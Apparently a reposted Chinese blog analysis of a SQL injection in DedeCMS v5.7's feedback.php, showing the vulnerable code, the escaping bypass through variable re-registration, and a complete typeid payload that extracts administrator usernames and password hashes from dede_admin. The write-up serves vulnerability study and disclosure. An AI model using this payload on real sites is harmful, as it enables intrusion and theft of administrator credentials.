该漏洞是cyg07在乌云提交的, 漏洞文件: plus\feedback.php。
存在问题的代码:

01 ...
02 if($comtype == 'comments')
03     {
04         $arctitle addslashes($title);
05         if($msg!='')
06         {//$typeid变量未做初始化
07             $inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`)
08                    VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime''{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg'); ";
09         echo $inquery;//调试,输出查询语句
10             $rs $dsql->ExecuteNoneQuery($inquery);
11             if(!$rs)
12             {
13                 ShowMsg(' 发表评论错误! ''-1');
14                 //echo $dsql->GetError();
15                 exit();
16             }
17         }
18     }
19     //引用回复
20     elseif ($comtype == 'reply')
21     {
22         $row $dsql->GetOne("SELECT * FROM `#@__feedback` WHERE id ='$fid'");
23         $arctitle $row['arctitle'];
24         $aid =$row['aid'];
25         $msg $quotemsg.$msg;
26         $msg = HtmlReplace($msg, 2);
27         $inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)
28                 VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')";
29         $dsql->ExecuteNoneQuery($inquery);
30 }

完整的输入语句,第二个参数 typeid可控。

1 INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`) VALUES ('108','2','游客','paxmac','127.0.0.1','1','1351774092''0','0','0','feedback','0','nsfocus&&paxmac team');

想要利用注入,就要先了解下dedecms的防御机制。
首先他对一切request进来的参数都会进行转义,具体看代码

common.inc.php文件 会把所有的request进行处理。

01 function _RunMagicQuotes(&$svar)
02 {
03     if(!get_magic_quotes_gpc())
04     {
05         ifis_array($svar) )
06         {
07             foreach($svar as $_k => $_v$svar[$_k] = _RunMagicQuotes($_v);
08         }
09         else
10         {
11             ifstrlen($svar)>0 && preg_match('#^(cfg_|GLOBALS|_GET|_POST|_COOKIE)#',$svar) )
12             {
13               exit('Request var not allow!');
14             }
15             $svar addslashes($svar);
16         }
17     }
18     return $svar;
19 }
20 …..
21 foreach(Array('_GET','_POST','_COOKIE'as $_request)
22     {
23         foreach($$_request as $_k => $_v)
24         {
25             if($_k == 'nvarname') ${$_k} = $_v;
26             else ${$_k} = _RunMagicQuotes($_v);
27         }
28     }
29 ….

从上面代码可以看到他对外来的提交进行了转义处理,但是在filter.ini.php文件中

01 function _FilterAll($fk, &$svar)
02 {
03     global $cfg_notallowstr,$cfg_replacestr;
04     ifis_array($svar) )
05     {
06         foreach($svar as $_k => $_v)
07         {
08             $svar[$_k] = _FilterAll($fk,$_v);
09         }
10     }
11     else
12     {
13         if($cfg_notallowstr!='' && preg_match("#".$cfg_notallowstr."#i"$svar))
14         {
15             ShowMsg(" $fk has not allow words!",'-1');
16             exit();
17         }
18         if($cfg_replacestr!='')
19         {
20             $svar = preg_replace('/'.$cfg_replacestr.'/i'"***"$svar);
21         }
22     }
23     return $svar;
24 }
25  
26 /* 对_GET,_POST,_COOKIE进行过滤 */
27 foreach(Array('_GET','_POST','_COOKIE'as $_request)
28 {
29     foreach($$_request as $_k => $_v)
30     {
31         ${$_k} = _FilterAll($_k,$_v);
32     }
33 }

上面是处理敏感词的代码,但是又对变量进行了注册,导致了变量二次覆盖漏洞。其实这漏洞很早前就存在,之前的是因为对提交的变量只检查一维数组的key,可以被绕过从而创建不允许的系统配置变量,dedecms历来的修改都让人摸不着头脑,修补的都是表面的东西,实质导致漏洞问题的原因不做修改。从这次的补丁看来,他就只加了一句判断$typeid是否为数字,对于80sec的防注入代码2次被绕过还继续无视。
所以在GPC=OFF的时候,被转义的变量又会被重新覆盖而变成正常代码。
Eg: typeid=2\’ 经过覆盖 typeid=2’
研究过上次dedecms SQL注入的问题的同学肯定了解他的防注入机制。这里做下简单的分析。他对于\到\之间的内容作为可信任,不对其进行检查。所以我们只要把想利用的代码放在’ ‘内就能躲过检查。利用Mysql的一个语法,他的值@`’`为空,下面来构造漏洞exp:
typeid=123′,@`’`,0×11111,1111,1,1351739660, 0,0,0,0,0,(SELECT concat(uname,0x5f,pwd,0x5f) FROM dede_admin)),(108,’1111
我用tamper data提交此参数,

其实这里也利用了一个小bug

可以看到他的表结构,只有msg可以为null,但是利用代码中在username中用了null,这是非法的语句,单独插入是不会成功的,但是后面一句语句是成立的,insert (a,b) values (1,1),(2,2) (1,1,)非法 (2,2)符合条件的时候会成功同时插入2条语句。由于显示字符数量的问题,所以选择了msg字段作为输出。

Dedecms v5.7 最新注入分析的更多相关文章

  1. DedeCMS V5.7sp2最新版本parse_str函数SQL注入漏洞

    织梦dedecms,在整个互联网中许多企业网站,个人网站,优化网站都在使用dede作为整个网站的开发架构,dedecms采用php+mysql数据库的架构来承载整个网站的运行与用户的访问,首页以及栏目 ...

  2. Dedecms <= V5.6 Final模板执行漏洞

    漏洞版本: Dedecms V5.6 Final 漏洞描述: Dedecms V5.6 Final版本中的各个文件存在一系列问题,经过精心构造的含有恶意代表的模板内容可以通过用户后台的上传附件的功能上 ...

  3. CVE-2018-20129:DedeCMS V5.7 SP2前台文件上传漏洞

    一.漏洞摘要 漏洞名称: DedeCMS V5.7 SP2前台文件上传漏洞上报日期: 2018-12-11漏洞发现者: 陈灿华产品首页: http://www.dedecms.com/软件链接: ht ...

  4. DedeCMS V5.7 SP2后台代码执行漏洞复现(CNVD-2018-01221)

    dedeCMS  V5.7 SP2后台代码执行漏洞复现(CNVD-2018-01221) 一.漏洞描述 织梦内容管理系统(Dedecms)是一款PHP开源网站管理系统.Dedecms V5.7 SP2 ...

  5. 织梦DedeCms网站内部SEO详细分析

    一.确定网站的目标关键词 最为重要的一方面,一般网站首页的目标关键词建议在1-3个.对于目标关键词的选取有几个建议 1.定位:网站的内容和业务相关 2.分析:对用户体验及竞争对手的网站进行分析 3.筛 ...

  6. 为dedecms v5.7的ckeditor添加jwplayer插件

    dedecms v5.7的默认编辑器是ckeditor,不过用的是php版本的,默认的工具栏不在config.js里面配置,而是在ckeditor.inc.php里面配置,默认的工具栏是$toolba ...

  7. Dedecms v5.7包含上传漏洞利用

    Title:Dedecms v5.7包含上传漏洞利用 --2012-09-21 10:16 注册,登录,免邮箱验证. up.htm ---------------------------------- ...

  8. 织梦DedeCMS v5.7 实现导航条下拉菜单

    首先将下面这段代码贴到templets\default\footer.htm文件里(只要在此文件里就行,位置无所谓) <</span>script type='text/javasc ...

  9. 技能提升丨Seacms 8.7版本SQL注入分析

    有些小伙伴刚刚接触SQL编程,对SQL注入表示不太了解.其实在Web攻防中,SQL注入就是一个技能繁杂项,为了帮助大家能更好的理解和掌握,今天小编将要跟大家分享一下关于Seacms 8.7版本SQL注 ...

随机推荐

  1. Math类和Random类(数学公式相关类)

    Math 类包含用于执行基本数学运算的方法,如初等指数.对数.平方根和三角函数. 常用方法: 1.static 数值类型 abs(数值类型 a)      返回 double 值的绝对值. 2.sta ...

  2. 用 eric6 与 PyQt5 实现python的极速GUI编程(系列02)---- 省市县(区)下拉列表多级联动

    [概览] 本文实现如下的程序: 主要步骤如下: 1.在eric6中新建项目,新建窗体 2.(自动打开)进入PyQt5 Desinger,编辑图形界面,保存 3.回到eric 6,对上一步得到的界面文件 ...

  3. JAVABEAN连接各数据库

    1.  连接ACCESS( AccessBean.java) package access; import java.sql.*; public class AccessBean { String d ...

  4. [CareerCup] 4.4 Create List at Each Depth of Binary Tree 二叉树的各层创建链表

    4.4 Given a binary tree, design an algorithm which creates a linked list of all the nodes at each de ...

  5. GDB深入研究

    GDB深入研究 一.GDB代码调试 (一)GDB调试实例 在终端中编译一个示例C语言小程序,保存到文件 gdb-sample.c 中,用GCC编译之 #include <stdio.h> ...

  6. SDAccel-FPGA将带来至多25倍单位功耗性能提升

    很久没有看FPGA了,本来想继续学习HLS,就上Xilinx的网站看了看.结果发现了SDx 开发环境,很新的一个东西.由于我对这方面了解不多,本篇博文仅仅只是资料的整合和介绍. 1.SDx开发环境 X ...

  7. 【转】十分详细的xStream解析

    转自博文:http://www.cnblogs.com/hoojo/archive/2011/04/22/2025197.html xStream框架 xStream可以轻易的将Java对象和xml文 ...

  8. IT男的”幸福”生活"续6

    新的一年飘了一下,就过来了. 在过去的一年,大家都找到了自已的幸福吗? 时间在继续,人生得幸福.. 看了前面大家的回复,感觉挺开心的.像我们code Man,不可能总是coding.总得要一些生活调味 ...

  9. Andriod Studio Clear Project或Rebuild Project出错

    以前在Eclipse中出现过类似的错误:在编译工程时,提示无法删除bin目录下的某个jar. 想不到Android Studio中也会有. Clear Project或Rebuild Project, ...

  10. [bzoj1296][SCOI2009]粉刷匠(泛化背包)

    http://www.lydsy.com:808/JudgeOnline/problem.php?id=1296 分析: 首先预处理出每一行的g[0..T]表示这一行刷0..T次,最多得到的正确格子数 ...